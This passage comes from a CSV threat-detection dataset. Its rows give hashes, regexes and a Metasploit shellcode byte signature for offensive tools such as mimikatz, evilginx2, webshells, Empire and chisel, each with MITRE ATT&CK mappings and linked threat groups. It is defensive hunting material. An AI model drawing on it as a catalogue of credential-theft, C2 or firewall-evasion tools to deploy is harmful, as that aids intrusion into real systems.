T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","44485" "*fb4a9c6269ea58b893c6978105fd3e2b2bc6e72e24715c1824b45f40c87b850d*",".{0,1000}fb4a9c6269ea58b893c6978105fd3e2b2bc6e72e24715c1824b45f40c87b850d.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","44486" "*fb5490f0675eb7ff5a4f76341e77a1bec6b77d3546c9a779676285d0c2d3255c*",".{0,1000}fb5490f0675eb7ff5a4f76341e77a1bec6b77d3546c9a779676285d0c2d3255c.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","44489" "*fb5ae202219536d7864043594d2c0b2909a956c5c88e33afc8efe588f5d84296*",".{0,1000}fb5ae202219536d7864043594d2c0b2909a956c5c88e33afc8efe588f5d84296.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","44490" 
"*fb6a2914759e6644c5067b1b7308bc295d4b6b357b1ad9f904b430ba588654f8*",".{0,1000}fb6a2914759e6644c5067b1b7308bc295d4b6b357b1ad9f904b430ba588654f8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44493" "*fb74046f994a179d004abc1f9a6a00ffa8867dc011d2e2e9ca432fe9225227c2*",".{0,1000}fb74046f994a179d004abc1f9a6a00ffa8867dc011d2e2e9ca432fe9225227c2.{0,1000}","offensive_tool_keyword","keywa7","The tool that bypasses the firewall's Application Based Rules and lets you connect to anywhere","T1090.001 - T1071.004 - T1071.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/keywa7/keywa7","1","0","#filehash","N/A","6","1","61","9","2024-08-19T08:09:33Z","2024-08-05T15:27:26Z","44494" "*fb785781e1e83a00582d1d3348c70249c256db03ddc4513f5b1a0853949b76ba*",".{0,1000}fb785781e1e83a00582d1d3348c70249c256db03ddc4513f5b1a0853949b76ba.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","#filehash","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","44496" 
"*fb808cc0dbbe0b6cd1a58631befb038483fc3043175232cf7d5f9a0d29b31895*",".{0,1000}fb808cc0dbbe0b6cd1a58631befb038483fc3043175232cf7d5f9a0d29b31895.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","44498" "*fb834d272d81fcdad1dbceeaf118960fce2e0398a4ab47640fdbd139db9b947a*",".{0,1000}fb834d272d81fcdad1dbceeaf118960fce2e0398a4ab47640fdbd139db9b947a.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","44499" "*fb84be2d35811783dc2a2f6d1b1a80e4173c2f204f60a595f110134e3df5fee4*",".{0,1000}fb84be2d35811783dc2a2f6d1b1a80e4173c2f204f60a595f110134e3df5fee4.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","44500" "*fb88b7cf0b5a1136829a3cf1c25f536713e6d7033c8b95cf31ea1e1c14c33a55*",".{0,1000}fb88b7cf0b5a1136829a3cf1c25f536713e6d7033c8b95cf31ea1e1c14c33a55.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","44502" "*fb8b5d212f449a8ba61ab9ed9b44853315c33d12a07f8ce4642892750e251530*",".{0,1000}fb8b5d212f449a8ba61ab9ed9b44853315c33d12a07f8ce4642892750e251530.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","#filehash","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","44503" "*fb8c1454ea22ccc9d97cbd90692d38c3c63d551680f6632fe658598a9bb23c03*",".{0,1000}fb8c1454ea22ccc9d97cbd90692d38c3c63d551680f6632fe658598a9bb23c03.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44504" "*fb8e1c7fbb5f253cffd87b965e587b4cb611ca2e5a38a13db70a082d8b8fe49c*",".{0,1000}fb8e1c7fbb5f253cffd87b965e587b4cb611ca2e5a38a13db70a082d8b8fe49c.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","44505" "*fb93ead7778fa1593e651220420a86f63afcf3fdfc673f19c801b5de71ab5ac8*",".{0,1000}fb93ead7778fa1593e651220420a86f63afcf3fdfc673f19c801b5de71ab5ac8.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","44506" "*fb949f56cdf4e529d69565be537d248f369f54f4fcceeff2f04a82e9f778bc36*",".{0,1000}fb949f56cdf4e529d69565be537d248f369f54f4fcceeff2f04a82e9f778bc36.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44507" "*fb9a347d266e2e75fc1dd9f66e2bbb661069771458a8638c8c4c7a114bb52f05*",".{0,1000}fb9a347d266e2e75fc1dd9f66e2bbb661069771458a8638c8c4c7a114bb52f05.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44509" "*FB9B5E61-7C34-4280-A211-E979E1D6977F*",".{0,1000}FB9B5E61\-7C34\-4280\-A211\-E979E1D6977F.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz GUID project","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#GUIDproject","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","44510" 
"*fba90278c07ff36e8f4958fbe66bad409a65639acebbba7297f53ced7283a369*",".{0,1000}fba90278c07ff36e8f4958fbe66bad409a65639acebbba7297f53ced7283a369.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44513" "*f-bader/TokenTacticsV2*",".{0,1000}f\-bader\/TokenTacticsV2.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","1","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","44514" "*fbb4a1a49a0683247e83da8d2ccd4bdab51516a0a5cacbf6ff759213792e58e2*",".{0,1000}fbb4a1a49a0683247e83da8d2ccd4bdab51516a0a5cacbf6ff759213792e58e2.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","#filehash","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","44516" "*fbbb6062b35a604ec6a6cf0fd8f8cf298fc6a0551108bfdf4a65c8a03aa92fce*",".{0,1000}fbbb6062b35a604ec6a6cf0fd8f8cf298fc6a0551108bfdf4a65c8a03aa92fce.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44519" 
"*fbbc07b9b6d448c80d5bb8a086d715631b78e30eb10cb850601317b21256fb8d*",".{0,1000}fbbc07b9b6d448c80d5bb8a086d715631b78e30eb10cb850601317b21256fb8d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44520" "*fbbc434d1fedd6fdd2cc93714c98293284536dd68b58645db0ebec5c3cb375bb*",".{0,1000}fbbc434d1fedd6fdd2cc93714c98293284536dd68b58645db0ebec5c3cb375bb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","44521" "*fbc365a2b37cfa4b84000867c83be11fdd9137b97485f1286efd469a07907240*",".{0,1000}fbc365a2b37cfa4b84000867c83be11fdd9137b97485f1286efd469a07907240.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","44522" 
"*fbc6438df3960d925a5d2d4880ce806ac26a73a063c66e3804ff7de9046b354b*",".{0,1000}fbc6438df3960d925a5d2d4880ce806ac26a73a063c66e3804ff7de9046b354b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44523" "*fbcbcfae5662f9f0dfbf7f5cb31c052399382232a51554197f4554d1bb06332f*",".{0,1000}fbcbcfae5662f9f0dfbf7f5cb31c052399382232a51554197f4554d1bb06332f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44524" "*fbd0e54fedad58bf67971c40fcf7326684a2ec8c882cb14b27ac0ffb9a1fa60b*",".{0,1000}fbd0e54fedad58bf67971c40fcf7326684a2ec8c882cb14b27ac0ffb9a1fa60b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44525" 
"*fbd415807cca02732e2b7b7ad2d8fd09db1ab75953fe24fe7b6238f691c6e5a8*",".{0,1000}fbd415807cca02732e2b7b7ad2d8fd09db1ab75953fe24fe7b6238f691c6e5a8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44526" "*fbd9f058f3838363b1f6f3e63b22ae60532af2f21f5c73b18899c9b0b888e3f3*",".{0,1000}fbd9f058f3838363b1f6f3e63b22ae60532af2f21f5c73b18899c9b0b888e3f3.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - 
TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","44527" "*fbe18d97dcbd4ee2b6d3d9457142595613cb86a3f59fc7a54f52731925e5026e*",".{0,1000}fbe18d97dcbd4ee2b6d3d9457142595613cb86a3f59fc7a54f52731925e5026e.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#filehash","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","44529" "*fbe35bdcceb19b3c20e8a212a5a6fa853e9d452321b75da7bbbb7666631c6dc4*",".{0,1000}fbe35bdcceb19b3c20e8a212a5a6fa853e9d452321b75da7bbbb7666631c6dc4.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","44530" "*fbe48841312643343af444c95bbc251c9e5dd6a40c784ea238ec9761e0886895*",".{0,1000}fbe48841312643343af444c95bbc251c9e5dd6a40c784ea238ec9761e0886895.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - 
Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","#filehash","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","44531" "*fbebaaf3a90be35d2e00d1edf45b98799357f9321ff1b94ccfd2a22e44203052*",".{0,1000}fbebaaf3a90be35d2e00d1edf45b98799357f9321ff1b94ccfd2a22e44203052.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","44532" "*fbee25dd2d6b1faf917f4f6a90113e3c520125f325915b7dd70f304dd2dab4b1*",".{0,1000}fbee25dd2d6b1faf917f4f6a90113e3c520125f325915b7dd70f304dd2dab4b1.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","Dispossessor","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","0","#filehash","N/A","10","7","609","74","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z","44533" "*fbf810fe9b9d5d4e0e2c8bb919d1c6cdfb80531815e06dacfa1bc13320fc136d*",".{0,1000}fbf810fe9b9d5d4e0e2c8bb919d1c6cdfb80531815e06dacfa1bc13320fc136d.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","44535" "*FC 48 83 E4 F0 E8 CC 00 00 00 41 51 41 50 52 48 31 D2 51 65 48 8B 52 60 48 8B 52 18 48 8B 52 
20*",".{0,1000}FC\s48\s83\sE4\sF0\sE8\sCC\s00\s00\s00\s41\s51\s41\s50\s52\s48\s31\sD2\s51\s65\s48\s8B\s52\s60\s48\s8B\s52\s18\s48\s8B\s52\s20.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","#content","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","44536" "*fc03035a9a7e7147f4a61fba442fcbbdc1a56e90880b731aa7c16909381296e0*",".{0,1000}fc03035a9a7e7147f4a61fba442fcbbdc1a56e90880b731aa7c16909381296e0.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44537" "*fc04cd7b616aa8a43a35a5318a9454f4228c74b056bfa07ec14105d249593e35*",".{0,1000}fc04cd7b616aa8a43a35a5318a9454f4228c74b056bfa07ec14105d249593e35.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44538" "*fc0ceb113a9dd259d3f8029f0304e4be3ba72376a1d55b101b87b8d9e9b3a11a*",".{0,1000}fc0ceb113a9dd259d3f8029f0304e4be3ba72376a1d55b101b87b8d9e9b3a11a.{0,1000}","offensive_tool_keyword","Invoke-SessionHunter","Retrieve and display information about active user sessions on remote computers. No admin privileges required","T1033 - T1078 - T1110","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-SessionHunter","1","0","#filehash","N/A","7","2","183","20","2024-08-12T13:15:10Z","2023-08-13T13:22:05Z","44539" "*fc0e69e5c2f4ed4cfb830ebb66ba54a86ce95a114603a5fffa42cea8caf3e864*",".{0,1000}fc0e69e5c2f4ed4cfb830ebb66ba54a86ce95a114603a5fffa42cea8caf3e864.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","44540" "*fc1b0c344766d70255be2cf421039e8f20476ea852f1ab081e81b525cfd989fb*",".{0,1000}fc1b0c344766d70255be2cf421039e8f20476ea852f1ab081e81b525cfd989fb.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44541" "*fc1c5daf562d06aed9ffd945fb2766c5cf81318c685357444739926b47bcab1e*",".{0,1000}fc1c5daf562d06aed9ffd945fb2766c5cf81318c685357444739926b47bcab1e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44542" "*fc1ca88117a5a0328991e63be9340c949d22a25f53134d04c1ffc7be2ed69e6a*",".{0,1000}fc1ca88117a5a0328991e63be9340c949d22a25f53134d04c1ffc7be2ed69e6a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44543" "*fc22650b89b63d52f14ec5d17c0ee92b1d897825c6b7eb3db391e18268567d25*",".{0,1000}fc22650b89b63d52f14ec5d17c0ee92b1d897825c6b7eb3db391e18268567d25.{0,1000}","offensive_tool_keyword","mimipy","Tool to dump passwords from various processes memory","T1003","TA0006","N/A","N/A","Credential 
